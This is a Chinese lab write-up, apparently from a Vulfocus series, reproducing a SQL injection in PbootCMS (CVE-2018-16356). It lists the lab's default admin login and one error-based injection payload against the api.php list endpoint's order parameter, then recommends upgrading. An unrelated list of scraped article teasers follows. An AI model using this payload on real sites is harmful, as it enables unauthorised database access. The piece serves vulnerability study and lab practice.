00勇士王子
00勇士王子

[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)

简介

PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。 PbootCMS中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 后台路径:/admin.php 用户名密码:admin:123456 授权码自行获取:https://www.pbootcms.com/freesn/

靶场搭建

使用在线靶场http://vulfocus.fofa.so
[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)_第1张图片
进入环境,发现需要获取授权码
[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)_第2张图片
https://www.pbootcms.com/freesn/
进入网站,输入域名获取授权码
[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)_第3张图片
然后进入网站后台
后台路径:/admin.php 用户名密码:admin:123456
[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)_第4张图片
[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)_第5张图片
输入域名授权码并提交

[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)_第6张图片
将API启用
[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)_第7张图片
再次访问网站,已经可以正常访问了

漏洞复现

构造payload

/api.php/List/index?order=123%20and(updatexml(1,concat(0x7e,(select%20md5(1954))),1))%20%23

在这里插入图片描述
payload中的md5(1954)被执行,证明漏洞存在。

修复

升级为最新版本

你可能感兴趣的:(漏洞复现,sql,安全,web安全)

  • 深度解析】使用Go语言实现JWT:从原理到实践 IsPrisoner golang学习
    JWT(JSONWebToken)已成为现代Web应用中身份验证的基石。本文深入剖析如何用Go语言实现JWT,从基础概念、底层机制到完整代码实践,助你全面掌握。一、JWT概述JWT是一种开放标准(RFC7519),用于在网络应用间安全地传输信息。其典型结构包含三部分:Header(头部)、Payload(载荷)和Signature(签名),以点分隔形成`xxxxx.yyyyy.zzzzz`格式。(
  • 1.1.1 配置无线控制器和访问点以增强网络安全(已改) 萱配巍 网络
    文章目录一、试题拓扑图及考试说明二、操作步骤1.设定无线控制器名称与VLAN划分2.配置DHCP服务3.配置AC的AP组并导入AP4.配置无线业务参数,创建并配置以下模板:5.配置AP组引用VAP模板6.保存所有设备的配置三、完成后的情况验证1.拓扑2.STA验证一、试题拓扑图及考试说明随着业务扩展,信息安全成为公司管理层的重点关注对象。为了实施集中管理公司的无线网络环境,如图1所示,现在需要对无
  • 车载以太网-ARP 动态 静态 天赐好车 车载以太网车载以太网ARP
    目录ARP(地址解析协议):动态与静态**一、ARP协议的基本概念****二、动态ARP与静态ARP的核心区别****三、动态ARP:原理与机制**1.**工作流程**2.**缓存管理****四、静态ARP:配置与应用**1.**手动配置方式**2.**典型应用场景****五、动态ARP的安全风险与防护**1.**常见攻击方式**2.**防护措施****六、总结:如何选择动态或静态ARP?**车载
  • 通过HTTPS访问Harbor2.13.1 的配置 云游 HarbordockerhttpsHarbor
    1.环境操作系统版本:Ubuntu24.04.2LTSopenssl的版本:3.0.15Harbor版本:2.13.12.说明默认情况下,Harbor不附带证书。可以在没有安全性的情况下部署Harbor,这样您就可以通过HTTP连接到它。然而,只有在没有连接到外部互联网的测试或开发环境中,使用HTTP才是可接受的。在非测试环境中使用HTTP会使您面临中间人攻击。在生产环境中,始终使用HTTPS。要
  • NAT穿透 P2P通信 介绍 ccCoKOll p2p网络协议网络
    NAT穿透与P2P通信是互联网通信领域中的关键技术,特别是在多点通信、实时互动以及设备间的直接连接中。NAT(网络地址转换)技术在保护网络安全和解决IP地址稀缺问题的同时,也对P2P(对等网络)通信带来了挑战。P2P通信则是一种网络架构,其中每个节点既是服务的提供者也是消费者,它们之间可以直接交换数据,无需通过中央服务器。在P2P网络中,每个节点都有自己的唯一标识,通常是IP地址和端口号。但在NA
  • 深入了解大数据领域Zookeeper的ACL权限管理 AGI大模型与大数据研究院 大数据zookeeperwpfai
    深入了解大数据领域Zookeeper的ACL权限管理关键词:Zookeeper、ACL权限管理、大数据安全、分布式系统、访问控制、权限模型、数据保护摘要:本文深入探讨了Zookeeper中的ACL(AccessControlList)权限管理系统。作为分布式协调服务的核心组件,Zookeeper的ACL机制对于保障大数据环境中的数据安全至关重要。文章将从基础概念出发,详细解析ZookeeperAC
  • SafeMimic:迈向安全自主的人-到-机器人模仿移动操作 三谷秋水 智能体机器学习人工智能安全机器人人工智能机器学习
    25年6月来自德州Austin分校的论文“SafeMimic:TowardsSafeandAutonomousHuman-to-RobotImitationforMobileManipulation”。机器人要想成为高效的家居助手,必须学会仅通过观察人类操作即可完成新的移动操作任务。仅凭人类的单个视频演示进行学习极具挑战性,因为机器人需要首先从演示中提取需要完成的任务及其方法,将策略从第三人称视角
  • 【JAVA学习】泛型 我不会写代码njdjnssj 学习
    传统方法不能对加入到集合ArrayList中的数据类型进行约束,遍历的时候需要进行类型转换,如果集合中的数据量较大,对效率有影响。泛型又称参数化类型,是JDK5.0出现的新特性,解决数据类型的安全性问题,在类声明或实例化时只要指定好需要的具体类型即可。泛型的好处:1)编译时,检查添加元素的类型,提高了安全性。2)减少了类型转换的次数,提高效率。Dog->Dog->Dog不加泛型的话:Dog加入->
  • ESXi 8 相较于 ESXi 7 升级 SZHCI 网络服务器数据库
    ESXi8相较于ESXi7在多方面进行了显著提升,主要集中在‌性能、安全性、硬件支持、虚拟化管理效率和未来兼容性‌上。以下是关键改进点的详细对比:‌对比维度‌‌ESXi7‌‌ESXi8‌‌核心优势‌‌硬件支持‌•支持旧代CPU•PCIe3.0•最高6TBRAM•IntelSapphireRapids•AMDEPYC7003/9004•PCIe4.0/5.0•最高24TBRAM✅支持最新服务器平台✅
  • Java面试——场景题 一只特立独行的猪611 Java面试java
    1.如何分批处理数据?1.使用LIMIT和OFFSET子句:这是最常用的分批查询方法。例如,你可以使用以下SQL语句来分批查询数据:SELECT*FROMyour_tableLIMIT1000OFFSET0;分批查询到的数据在后端进行处理,达到分批处理数据的效果。2.使用多线程的方式:如果你需要用多线程分批处理数据,并且数据所在表的主键id是递增的,可以使用取模的方式进行分批查询。例如:impor
  • 揭秘代码的安全漏洞是如何被发现的:代码扫描工具fortify的详细介绍 G探险者 javajavafortify漏洞扫描
    前言在许多对安全性有所关注的公司中,代码安全扫描已成为一项关键的实践。但是,面对频繁出现的安全漏洞升级,大家可能会感到困惑和头疼。那么,这些令人不安的漏洞究竟是如何被发现的呢?今天我们将为大家揭示安全漏洞发现的奥秘。fortify概述Fortify是一款广泛使用的静态应用程序安全测试(SAST)工具,由MicroFocus开发和维护。用Java语言开发的。具有良好的跨平台兼容性,可以支持多种操作系
  • Java线程安全集合类 paishishaba java开发语言
    目录概述主要线程安全集合类及对比1.List系列2.Map系列3.Set系列4.Queue系列核心区别与选择标准使用场景案例实践建议概述Java集合框架提供了多种线程安全的集合实现,主要分为三大类:早期线程安全集合:Vector、Hashtable同步包装集合:Collections.synchronizedXxx()并发集合:java.util.concurrent包下的实现主要线程安全集合类及
  • 危化之路. 蓝海物流 物流
    我永远记得2024年3月18日清晨,师傅老陈递来的那个铝制饭盒。盒盖上用红漆写着"安全3650天",里面整整齐齐码着十二种颜色的试纸。"这是你的枪。"他说话时,运输甲苯的槽罐车正在晨雾中冒着白气。驶入G15高速的第三公里处,老陈突然让我记录仪表盘数据。"温度28.4℃,压力0.15MPa,胎压2.8。"我念完才发现他根本没看仪表。"这是最危险的路段,"他左手始终悬在紧急制动阀上方,"五年前有辆车在
  • RBAC权限模型如何让API访问控制既安全又灵活?
    url:/posts/9f01e838545ae8d34016c759ef461423/title:RBAC权限模型如何让API访问控制既安全又灵活?date:2025-07-01T04:52:07+08:00lastmod:2025-07-01T04:52:07+08:00author:cmdragonsummary:RBAC权限模型通过用户、角色和权限的关联实现访问控制,核心组件包括用户、角色
  • 袋鼠数据库工具 7.99.1 版已上线
    袋鼠数据库工具是一款AI驱动的热门数据库系统客户端(MariaDB/MySQL/Oracle/PostgreSQL/Redis/SQLite/SQLServer/...),支持建表、查询、模型、同步、导入导出等功能,支持Windows/Mac/Linux等操作系统,致力于打造一款好用、好玩、开发友好的开发者工具。重点特性介绍这个版本继续完善Redis支持,实现了Redis用户管理支持,实现了数据格
  • docker 搭建mysql 连接不上_docker搭建MySQL主从集群 Grayce docker搭建mysql连接不上
    关于MySQL主从模式,如果我们直接在本机上搭建的话,是没法搭建的,只能借助于虚拟机,但有的时候我们又需要搭建一个主从集群,以便于进行一些功能性的测试。这个时候我们就可以尝试使用docker,借助于docker的容器化技术,我们只需要创建两个MySQL容器,并且占用主机的两个端口即可,对主机没有其他额外的影响。这种方式非常的轻量,而且也容易复制。本文则主要讲解如何通过docker来搭建MySQL集
  • 通过docker快速搭建mysql主从集群(一主两从) NazzzzMini dockerdockermysql运维
    通过docker快速搭建mysql主从集群(一主两从):首先请确保你的服务器已安装了docker⁄(⁄⁄•⁄ω⁄•⁄⁄)⁄,那么接下来,我们进入正题~1.镜像拉取#latest目前版本为8.0.13;dockerpullmysql:latest2.启动主库镜像dockerrun\--restart=always\-p3306:3306--namemysql\-v/opt/mysql/log:/va
  • 【MySQL】基于Docker搭建MySQL一主二从集群 不想睡觉的橘子君 踩坑专栏mysqlDockermysqldocker数据库
    本文记录了搭建mysql一主二从集群,这样的一个集群master为可读写,slave为只读。过程中使用了docker,便于快速搭建单体mysql。1,准备dockerdocker的安装可以参考之前基于yum安装docker的文章[1]。容器相关命令[2]。查看正在运行的容器dockerps查看所有容器(查看正在运行的和已经停止运行的)dockerps–adockerps-all查看最后一次运行的容
  • Zabbix和Prometheus的区别 运维小贺 zabbixprometheus运维
    Zabbix监控平台监控概念对服务的管理,不能仅限于可用性。还需要服务可以安全、稳定、高效地运行。监控的目的:早发现、早治疗。被监控的资源类型:公开数据:对外开放的,不需要认证即可获取的数据私有数据:对外不开放,需要认证、权限才能获得的数据Zabbix是什么?Zabbix是个适用于监控硬件服务器的一款开源的分布式监控方案实施监控的几个方面:数据采集:使用agent(可安装软件的系统上)、SNMP(
  • VR训练美国服务器:高性能解决方案与优化指南 cpsvps vr科技服务器
    随着虚拟现实技术的快速发展,VR训练已成为军事、医疗和教育领域的重要工具。美国作为全球科技领先国家,其服务器资源在支持VR训练方面具有显著优势。本文将深入分析VR训练对美国服务器的需求特点、技术架构选择标准、网络延迟优化方案、数据安全防护策略以及未来发展趋势,为需要跨境部署VR训练系统的用户提供专业参考。VR训练美国服务器:高性能解决方案与优化指南VR训练对服务器性能的核心需求VR训练系统对服务器
  • 服务器被病毒入侵如何彻底清除? bocco 安全狗服务器运维
    当服务器遭遇病毒入侵时,彻底清除病毒是确保系统安全和数据完整性的关键步骤。这一过程不仅需要技术上的精准操作,还需要严密的计划、合理的资源调配以及后续的防范措施。以下是一篇关于如何在服务器被病毒入侵时彻底清除病毒的详细指南。一、初步响应与隔离一旦发现服务器出现异常行为,如系统速度变慢、频繁崩溃、数据丢失或异常网络连接等,应立即启动应急响应计划。首先,确保所有用户账户和密码的安全性,防止病毒进一步扩散
  • 十个服务器中毒的常见特征及其检测方法 群联云防护小杜 安全问题汇总服务器运维零售安全网络
    服务器作为企业的核心资源,其安全性至关重要。一旦服务器被病毒入侵,不仅会影响系统的正常运行,还可能导致数据泄露等严重后果。以下是十种常见的服务器中毒特征及其检测方法。1.系统性能下降病毒常常占用大量的CPU和内存资源,导致服务器响应速度变慢。检测代码示例(Linux):#查看系统负载uptime#查看CPU使用情况top-b-n1|grepCpu(s)#查看内存使用情况free-m2.系统日志中出
  • MYSQL的基础信息如何存放 月堂 oracle数据库
    一、存储位置与版本差异1、MySQL8.0+(事务化存储)系统表存储:所有元数据(表结构、索引、权限等)统一存储在mysql系统库的InnoDB事务表中(如mysql.tables、mysql.columns),物理文件为mysql.ibd。优势:性能优化:INFORMATION_SCHEMA改为内存视图,查询效率提升(无需解析文件)。原子DDL:DDL操作(如建表、删表)完全事务化,失败自动回滚
  • 如何利用硬件安全模块(HSM)保护加密密钥 网硕互联的小客服 服务器运维网络
    硬件安全模块(HSM,HardwareSecurityModule)是一种专用的硬件设备,设计用于生成、存储和保护加密密钥。HSM提供了强大的物理和逻辑安全性,防止密钥被泄露或篡改。以下将详细介绍HSM的功能、工作原理,以及如何利用HSM来保护加密密钥。1.什么是HSM?HSM是一种专门用于执行加密操作的硬件设备,通常具备以下特点:硬件加密:支持快速的加密、解密和签名操作。物理安全性:防篡改设计,
  • 新手向:从零开始MySQL超详细安装、配置与使用指南 nightunderblackcat 基础环境配置mysql数据库
    什么是MySQL?一句话解释:MySQL是全球最流行的开源关系型数据库,像淘宝、Facebook等大型网站都在使用它存储数据!它采用表格形式管理数据(类似Excel),支持SQL语言进行数据操作。第一步:安装MySQL(多系统详解)Windows系统下载安装包:访问官网:https://dev.mysql.com/downloads/mysql/选择MySQLInstallerMSI(Window
  • 04_MySQL 通过 Docker 在同一个服务器上搭建主从集群(一主一从) 耀耀_很无聊 【实施】实施日记mysqldocker服务器
    04_MySQL通过Docker在同一个服务器上搭建主从集群(一主一从)准备工作1.拉取MySQL镜像bash复制编辑dockerpullmysql:8.0.262.创建主从配置目录bash复制编辑mkdir-p/root/mysql/master/confmkdir-p/root/mysql/master/datamkdir-p/root/mysql/master/mysql-filesmkdi
  • 8 [GitHub开源项目被投毒后门病毒跟随开发流程传播蔓延] 学编程的闹钟 GitHubgithub开源
    现如今,代码的开放给软件开发提供了诸多便利,GitHub就是其中极具代表性的平台。然而随着“开放”逐渐广泛,其被恶意利用的风险也随之增加。近年来,一种隐蔽又危险的攻击手段——代码投毒,悄悄成了威胁开发者和用户安全的隐患。攻击者会在开源项目或代码库里植入有害代码,这些看似正常的代码,一旦被开发者无意中引入,就会在开发链条中蔓延,最终让用户也面临安全风险。近期,火绒威胁情报中心监测到一批GitHub投
  • AWS Cognito vs. IAM Identity Center:别再混淆了!理清“用户身份”与“员工身份”的区别 运维开发王义杰 aws信息安全系统运维aws云计算
    大家好,在AWS庞大的服务家族中,身份管理是构建安全、可扩展应用的核心。而提到身份管理,很多人常常会对AWSCognito和AWSIAMIdentityCenter(曾用名AWSSSO)感到困惑,特别是当看到它们都支持SAML时,会觉得功能似乎有所重合。这种困惑非常正常!它们确实都是处理“谁可以访问什么”的问题,但服务的对象和核心场景却截然不同。简单来说,一句话总结它们的核心区别就是:AWSCog
  • 深入浅出:AWS Cognito 认证机制详解 运维开发王义杰 信息安全系统运维awsaws云计算
    在当今的互联网应用中,用户认证和管理是不可或缺的一环。无论是Web应用还是移动App,都需要一套安全、可靠且易于扩展的认证系统。AWSCognito正是亚马逊云科技(AWS)提供的一项强大服务,旨在简化用户身份验证、授权和用户管理流程。作为一名科技博主,今天我将带大家深入了解Cognito的认证机制,并通过具体示例和实用建议,助大家轻松构建安全的应用。Cognito核心概念:用户池(UserPoo
  • Redis 与其他数据库的比较 jarenyVO redis数据库redis缓存
    Redis与其他数据库的比较以下是Redis与传统关系型数据库及其他NoSQL数据库的对比列表:Redisvs关系型数据库(MySQL/Oracle)对比维度Redis关系型数据库数据模型键值对、丰富数据结构(String/Hash/Set等)表结构,严格的行列模型持久化可配置(RDB快照/AOF日志)默认持久化,WAL日志+数据文件事务支持简单事务(无回滚)ACID事务,支持复杂回滚查询能力仅支
  • LeetCode[Math] - #66 Plus One Cwind javaLeetCode题解AlgorithmMath
    原题链接:#66 Plus One   要求: 给定一个用数字数组表示的非负整数,如num1 = {1, 2, 3, 9}, num2 = {9, 9}等,给这个数加上1。 注意: 1. 数字的较高位存在数组的头上,即num1表示数字1239 2. 每一位(数组中的每个元素)的取值范围为0~9   难度:简单   分析: 题目比较简单,只须从数组
  • JQuery中$.ajax()方法参数详解 AILIKES JavaScriptjsonpjqueryAjaxjson
    url: 要求为String类型的参数,(默认为当前页地址)发送请求的地址。 type: 要求为String类型的参数,请求方式(post或get)默认为get。注意其他http请求方法,例如put和    delete也可以使用,但仅部分浏览器支持。 timeout: 要求为Number类型的参数,设置请求超时时间(毫秒)。此设置将覆盖$.ajaxSetup()方法的全局
  • JConsole & JVisualVM远程监视Webphere服务器JVM Kai_Ge JVisualVMJConsoleWebphere
        JConsole是JDK里自带的一个工具,可以监测Java程序运行时所有对象的申请、释放等动作,将内存管理的所有信息进行统计、分析、可视化。我们可以根据这些信息判断程序是否有内存泄漏问题。   使用JConsole工具来分析WAS的JVM问题,需要进行相关的配置。   首先我们看WAS服务器端的配置.   1、登录was控制台https://10.4.119.18
  • 自定义annotation 120153216 annotation
    Java annotation 自定义注释@interface的用法 一、什么是注释      说起注释,得先提一提什么是元数据(metadata)。所谓元数据就是数据的数据。也就是说,元数据是描述数据的。就象数据表中的字段一样,每个字段描述了这个字段下的数据的含义。而J2SE5.0中提供的注释就是java源代码的元数据,也就是说注释是描述java源
  • CentOS 5/6.X 使用 EPEL YUM源 2002wmj centos
    CentOS 6.X 安装使用EPEL YUM源1. 查看操作系统版本[root@node1 ~]# uname -a Linux node1.test.com 2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux [root@node1 ~]#
  • 在SQLSERVER中查找缺失和无用的索引SQL 357029540 SQL Server
    --缺失的索引 SELECT  avg_total_user_cost * avg_user_impact * ( user_scans + user_seeks ) AS PossibleImprovement ,          last_user_seek ,    
  • Spring3 MVC 笔记(二) —json+rest优化 7454103 Spring3 MVC
    接上次的 spring mvc 注解的一些详细信息!                          其实也是一些个人的学习笔记  呵呵!
  • 替换“\”的时候报错Unexpected internal error near index 1 \ ^ adminjun java“\替换”
    发现还是有些东西没有刻子脑子里,,过段时间就没什么概念了,所以贴出来...以免再忘...   在拆分字符串时遇到通过 \ 来拆分,可是用所以想通过转义 \\ 来拆分的时候会报异常   public class Main {          /*
  • POJ 1035 Spell checker(哈希表) aijuans 暴力求解--哈希表
    /* 题意:输入字典,然后输入单词,判断字典中是否出现过该单词,或者是否进行删除、添加、替换操作,如果是,则输出对应的字典中的单词 要求按照输入时候的排名输出 题解:建立两个哈希表。一个存储字典和输入字典中单词的排名,一个进行最后输出的判重 */ #include <iostream> //#define using namespace std; const int HASH =
  • 通过原型实现javascript Array的去重、最大值和最小值 ayaoxinchao JavaScriptarrayprototype
    用原型函数(prototype)可以定义一些很方便的自定义函数,实现各种自定义功能。本次主要是实现了Array的去重、获取最大值和最小值。 实现代码如下:   <script type="text/javascript"> Array.prototype.unique = function() { var a = {}; var le
  • UIWebView实现https双向认证请求 bewithme UIWebViewhttpsObjective-C
              什么是HTTPS双向认证我已在先前的博文 ASIHTTPRequest实现https双向认证请求 中有讲述,不理解的读者可以先复习一下。本文是用UIWebView来实现对需要客户端证书验证的服务请求,网上有些文章中有涉及到此内容,但都只言片语,没有讲完全,更没有完整的代码,让人困扰不已。但是此知
  • NoSQL数据库之Redis数据库管理(Redis高级应用之事务处理、持久化操作、pub_sub、虚拟内存) bijian1013 redis数据库NoSQL
    3.事务处理         Redis对事务的支持目前不比较简单。Redis只能保证一个client发起的事务中的命令可以连续的执行,而中间不会插入其他client的命令。当一个client在一个连接中发出multi命令时,这个连接会进入一个事务上下文,该连接后续的命令不会立即执行,而是先放到一个队列中,当执行exec命令时,redis会顺序的执行队列中
  • 各数据库分页sql备忘 bingyingao oraclesql分页
    ORACLE 下面这个效率很低 SELECT * FROM ( SELECT A.*, ROWNUM RN FROM (SELECT * FROM IPAY_RCD_FS_RETURN order by id desc) A ) WHERE RN <20; 下面这个效率很高 SELECT A.*, ROWNUM RN FROM (SELECT * FROM IPAY_RCD_
  • 【Scala七】Scala核心一:函数 bit1129 scala
    1. 如果函数体只有一行代码,则可以不用写{},比如 def print(x: Int) = println(x) 一行上的多条语句用分号隔开,则只有第一句属于方法体,例如   def printWithValue(x: Int) : String= println(x); "ABC"   上面的代码报错,因为,printWithValue的方法
  • 了解GHC的factorial编译过程 bookjovi haskell
    GHC相对其他主流语言的编译器或解释器还是比较复杂的,一部分原因是haskell本身的设计就不易于实现compiler,如lazy特性,static typed,类型推导等。 关于GHC的内部实现有篇文章说的挺好,这里,文中在RTS一节中详细说了haskell的concurrent实现,里面提到了green thread,如果熟悉Go语言的话就会发现,ghc的concurrent实现和Go有点类
  • Java-Collections Framework学习与总结-LinkedHashMap BrokenDreams LinkedHashMap
            前面总结了java.util.HashMap,了解了其内部由散列表实现,每个桶内是一个单向链表。那有没有双向链表的实现呢?双向链表的实现会具备什么特性呢?来看一下HashMap的一个子类——java.util.LinkedHashMap。       
  • 读《研磨设计模式》-代码笔记-抽象工厂模式-Abstract Factory bylijinnan abstract
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ package design.pattern; /* * Abstract Factory Pattern * 抽象工厂模式的目的是: * 通过在抽象工厂里面定义一组产品接口,方便地切换“产品簇” * 这些接口是相关或者相依赖的
  • 压暗面部高光 cherishLC PS
    方法一、压暗高光&重新着色 当皮肤很油又使用闪光灯时,很容易在面部形成高光区域。 下面讲一下我今天处理高光区域的心得: 皮肤可以分为纹理和色彩两个属性。其中纹理主要由亮度通道(Lab模式的L通道)决定,色彩则由a、b通道确定。 处理思路为在保持高光区域纹理的情况下,对高光区域着色。具体步骤为:降低高光区域的整体的亮度,再进行着色。 如果想简化步骤,可以只进行着色(参看下面的步骤1
  • Java VisualVM监控远程JVM crabdave visualvm
    Java VisualVM监控远程JVM    JDK1.6开始自带的VisualVM就是不错的监控工具. 这个工具就在JAVA_HOME\bin\目录下的jvisualvm.exe, 双击这个文件就能看到界面   通过JMX连接远程机器, 需要经过下面的配置: 1. 修改远程机器JDK配置文件 (我这里远程机器是linux).    
  • Saiku去掉登录模块 daizj saiku登录olapBI
    1、修改applicationContext-saiku-webapp.xml <security:intercept-url pattern="/rest/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />  <security:intercept-url pattern=&qu
  • 浅析 Flex中的Focus dsjt htmlFlexFlash
    关键字:focus、 setFocus、 IFocusManager、KeyboardEvent 焦点、设置焦点、获得焦点、键盘事件 一、无焦点的困扰——组件监听不到键盘事件 原因:只有获得焦点的组件(确切说是InteractiveObject)才能监听到键盘事件的目标阶段;键盘事件(flash.events.KeyboardEvent)参与冒泡阶段,所以焦点组件的父项(以及它爸
  • Yii全局函数使用 dcj3sjt126com yii
    由于YII致力于完美的整合第三方库,它并没有定义任何全局函数。yii中的每一个应用都需要全类别和对象范围。例如,Yii::app()->user;Yii::app()->params['name'];等等。我们可以自行设定全局函数,使得代码看起来更加简洁易用。(原文地址) 我们可以保存在globals.php在protected目录下。然后,在入口脚本index.php的,我们包括在
  • 设计模式之单例模式二(解决无序写入的问题) come_for_dream 单例模式volatile乱序执行双重检验锁
                    在上篇文章中我们使用了双重检验锁的方式避免懒汉式单例模式下由于多线程造成的实例被多次创建的问题,但是因为由于JVM为了使得处理器内部的运算单元能充分利用,处理器可能会对输入代码进行乱序执行(Out Of Order Execute)优化,处理器会在计算之后将乱序执行的结果进行重组,保证该
  • 程序员从初级到高级的蜕变 gcq511120594 框架工作PHPandroidhtml5
    软件开发是一个奇怪的行业,市场远远供不应求。这是一个已经存在多年的问题,而且随着时间的流逝,愈演愈烈。 我们严重缺乏能够满足需求的人才。这个行业相当年轻。大多数软件项目是失败的。几乎所有的项目都会超出预算。我们解决问题的最佳指导方针可以归结为——“用一些通用方法去解决问题,当然这些方法常常不管用,于是,唯一能做的就是不断地尝试,逐个看看是否奏效”。 现在我们把淫浸代码时间超过3年的开发人员称为
  • Reverse Linked List hcx2013 list
    Reverse a singly linked list.   /** * Definition for singly-linked list. * public class ListNode { * int val; * ListNode next; * ListNode(int x) { val = x; } * } */ p
  • Spring4.1新特性——数据库集成测试 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • C# Ajax上传图片同时生成微缩图(附Demo) liyonghui160com
        1.Ajax无刷新上传图片,详情请阅我的这篇文章。(jquery + c# ashx)         2.C#位图处理  System.Drawing。         3.最新demo支持IE7,IE8,Fir
  • Java list三种遍历方法性能比较 pda158 java
    从c/c++语言转向java开发,学习java语言list遍历的三种方法,顺便测试各种遍历方法的性能,测试方法为在ArrayList中插入1千万条记录,然后遍历ArrayList,发现了一个奇怪的现象,测试代码例如以下: package com.hisense.tiger.list; import java.util.ArrayList; import java.util.Iterator;
  • 300个涵盖IT各方面的免费资源(上)——商业与市场篇 shoothao seo商业与市场IT资源免费资源
    A.网站模板+logo+服务器主机+发票生成 HTML5 UP:响应式的HTML5和CSS3网站模板。 Bootswatch:免费的Bootstrap主题。 Templated:收集了845个免费的CSS和HTML5网站模板。 Wordpress.org|Wordpress.com:可免费创建你的新网站。 Strikingly:关注领域中免费无限的移动优
  • localStorage、sessionStorage uule localStorage
    W3School 例子   HTML5 提供了两种在客户端存储数据的新方法: localStorage - 没有时间限制的数据存储 sessionStorage - 针对一个 session 的数据存储   之前,这些都是由 cookie 完成的。但是 cookie 不适合大量数据的存储,因为它们由每个对服务器的请求来传递,这使得 cookie 速度很慢而且效率也不
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他